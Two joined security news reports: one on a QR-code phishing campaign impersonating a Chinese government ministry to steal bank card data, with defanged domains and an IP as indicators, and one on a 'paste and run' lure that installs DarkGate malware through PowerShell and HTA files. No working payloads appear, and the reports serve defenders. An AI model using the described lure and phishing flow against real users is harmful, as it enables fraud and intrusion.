Researchers from Cyble Research and Intelligence Labs (CRIL) have discovered a QR code-based phishing campaign that uses malicious Word documents masquerading as official documents from the Ministry of Human Resources and Social Security of China. Users are tricked into providing bank card details and passwords under the guise of identity verification and authentication processes.

QR Code-Based Phishing Campaign

QR code phishing attacks have escalated significantly this year, with cybercriminals leveraging this technology to steal personal and financial information. Threat actors (TAs) are embedding QR codes in office documents and redirecting users to fraudulent websites designed to harvest sensitive data. In the ever-evolving cyber threat landscape, a new vector has emerged: QR code-based phishing campaign. Cybercriminals are increasingly embedding QR codes in malicious documents, which when scanned direct users to fraudulent websites. This tactic has seen a marked rise in 2024 following a trend that started during the COVID-19 pandemic, when QR codes became widely adopted for contactless transactions and information sharing. The Hoxhunt Challenge highlighted a 22% increase in QR code phishing during late 2023, and research by Abnormal Security indicates that 89.3% of these attacks aim to steal credentials. The growing familiarity with QR codes has created a false sense of security, making it easier for cybercriminals to exploit them. QR codes can mask destination URLs, preventing users from easily verifying the legitimacy of the site they are being redirected to.

Recent QR Code Campaigns and Techniques

Recently, Cyble Research and Intelligence Labs uncovered a sophisticated phishing campaign targeting individuals in China. This campaign saw the use of Microsoft Word documents embedded with QR codes, which are distributed via spam email attachments. The documents were designed to appear as official notices from the Ministry of Human Resources and Social Security of China, offering labor subsidies above 1000 RMB to lure victims. [caption id="attachment_77666" align="aligncenter" width="769"] MS Word file containing QR code (Source: Cyble)[/caption] The documents are meticulously crafted to look authentic, complete with official logos and language that mimics government communications. Once the QR code in the document is scanned, it redirects the user to a phishing site designed to collect sensitive information. This particular campaign stands out due to its use of a Domain Generation Algorithm (DGA), which generates a series of seemingly random domain names. DGA is a program that generates large numbers of new domain names. Cybercriminals and botnet operators generally use it to frequently change the domains used to launch malware attacks. This technique enables hackers to avoid malware-detection solutions that block specific domain names and static IP addresses. The latest campaign isn't an isolated incident. A similar phishing operation was documented in January 2023 by Fortinet, where cybercriminals impersonated another Chinese government agency. This resurgence in QR code phishing attacks indicates a persistent threat targeting Chinese citizens, with malicious actors continually refining their tactics to evade detection.

The QR Code Phishing Process

The phishing process begins with the user scanning the QR code from the malicious Word document. This action takes them to the phishing site, which initially displays a dialogue box promising a labor subsidy. The site is designed to appear official, complete with government logos and formal language to enhance credibility. The phishing site instructs the user to provide personal information, starting with their name and national ID. This step is presented as a necessary part of the application process for the subsidy. Once the user enters this information, they are directed to a second page that requests detailed bank card information, including the card number, phone number, and balance. This information is ostensibly required for identity verification and to process the subsidy. After collecting the bank card details, the phishing site asks the user to wait while their information is "verified." This waiting period is a tactic used to add a sense of legitimacy to the process. Following this, the site prompts the user to enter their bank card password, under the guise of further verification. This password is suspected to be the same as the payment password used for domestic credit card transactions. By obtaining this password along with the card details, the threat actors can perform unauthorized transactions, leading to significant financial losses for the victim.

Phishing Activity Technical IoCs

The phishing activity begins when the user scans the QR code embedded in the Word document. This action directs them to the link “hxxp://wj[.]zhvsp[.]com”. This initial URL then redirects to a subdomain, “tiozl[.]cn”, created using a DGA. The use of a DGA means the phishing URLs are constantly changing, making them harder to block preemptively. [caption id="attachment_77670" align="aligncenter" width="1024"] Landing page of phishing site (Source: Cyble)[/caption] The domain “tiozl[.]cn” is hosted on the IP address “20.2.161[.]134”. This IP address is associated with multiple other domains, suggesting a large-scale phishing operation. The domains linked to this campaign are: - 2wxlrl.tiozl[.]cn - op18bw[.]tiozl.cn - gzha31.tiozl[.]cn - i5xydb[.]tiozl.cn - hzrz7c.zcyyl[.]com Further investigation revealed that the SHA-256 fingerprint of an SSH server host key associated with the IP address “20.2.161[.]134” is linked to 18 other IPs, all within the same Autonomous System Number (ASN), AS8075, and located in Hong Kong. These IPs host URLs with similar patterns, indicating a coordinated effort to deploy numerous phishing sites. The rise in QR code phishing attacks underscores the increasing sophistication and adaptability of cybercriminals. By exploiting the widespread use of QR codes - especially in a post-pandemic world - these attacks effectively lure users into divulging sensitive financial information. The recent campaign targeting Chinese citizens highlights the severity of this threat, as malicious actors use seemingly official documents to gather card details and passwords, leading to significant financial losses. This trend emphasizes the need for heightened vigilance and robust security measures to protect against such evolving threats.

Recommendations for Mitigation

To mitigate the risk of QR code phishing attacks, CRIL said it is crucial to follow these cybersecurity best practices: 1. Scan QR codes from trusted sources only: Avoid scanning codes from unsolicited emails, messages, or documents, especially those offering financial incentives or urgent actions. 2. Verify URLs before proceeding: After scanning a QR code, carefully check the URL for legitimacy, such as official domains and secure connections (https://). 3. Install reputable antivirus and anti-phishing software: These tools can detect and block malicious websites and downloads. 4. Stay informed about phishing techniques: Educate yourself and others about the risks associated with QR codes to prevent successful phishing attacks. 5. Use two-factor authentication (2FA): This adds an extra layer of security, making it harder for attackers to gain unauthorized access. 6. Keep software up to date: Ensure your operating systems, browsers, and applications are updated with the latest security patches to protect against known vulnerabilities. 7. Use secure QR code scanner apps: Consider apps that check URLs against a database of known malicious sites before opening them. 8. Monitor financial statements regularly: Review your bank and credit card statements for unauthorized transactions and report any suspicious activity immediately.

Security researchers have uncovered a new phishing campaign that attempts to trick recipients into pasting (CTRL+V) and executing malicious commands on their system. It leverages a sophisticated attack chain along with what the researchers have dubbed the "paste and run" technique.

'Paste and Run' Phishing Technique

The attackers behind the campaign send emails to potential victims purporting to be from legitimate businesses or organizations. Researchers from AhnLab stated that these emails often involve topics such as fee processing or operational instructions to entice recipients into opening attached files. The emails contain a file attachment with disguised intent, as in the examples below. [caption id="attachment_75497" align="alignnone" width="1200"] Source: asec.ahnlab.com[/caption] Once the victim clicks on the HTML attachment, a fake message displays in the browser while disguising itself as a Microsoft Word document. This message directs the user to click on a "How to fix" button that purports to help them load the document offline. After clicking the button, a set of instructions prompt the user to type out a set of keyboard commands—first type [Win+R], then [Ctrl+V], and press [Enter]. [caption id="attachment_75494" align="alignnone" width="1200"] Source: asec.ahnlab.com[/caption] The button may alternatively load a different set of instructions directing the user to manually access the Windows PowerShell terminal and hit right-click within the terminal window. By following the instructions, the victim inadvertently pastes a malicious script to the terminal, which then executes in their system.

Phishing Scheme Installs DarkGate Malware

The PowerShell script downloaded and executed by the scheme is a component of the DarkGate malware family. Once the script is run, it downloads and executes an HTA (HTML Application) file from a remote command-and-control server. The HTA file then executes additional instructions to launch an AutoIt3.exe file while passing a malicious AutoIt script (script.a3x) as an argument. The script appears to load the DarkGate malware to infect the system while also clearing the user's clipboard to conceal the execution of malicious commands. "The overall operation flow from the reception of the email to the infection is quite complex, making it difficult for users to detect and prevent," the researchers noted. [caption id="attachment_75496" align="alignnone" width="1200"] Source: asec.ahnlab.com[/caption]

Protecting Against the Phishing Campaign

The researchers advised email recipients to remain cautious when handling unsolicited emails, even if they appear to be from legitimate sources, to avoid falling victim to the phishing campaign. Recipients should refrain from opening attachment files or clicking on links until they can verify the email sender and its content. "Users must take extra caution when handling files from unknown sources, especially the URLs and attachments of emails," the researchers emphasized. Additionally, recipients should also be wary of any messages that prompt them to execute commands, as it is a common tactic used by attackers to compromise systems. Upon receiving such requests, it is recommended to either ignore the email or report it to your organization's IT security team. The researchers also shared various indicators of compromise (IOCs) such as Base64-encoded PowerShell commands, HTA files, and Autoit scripts, download URLs, file signatures and behavioral indicators associated with the campaign. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.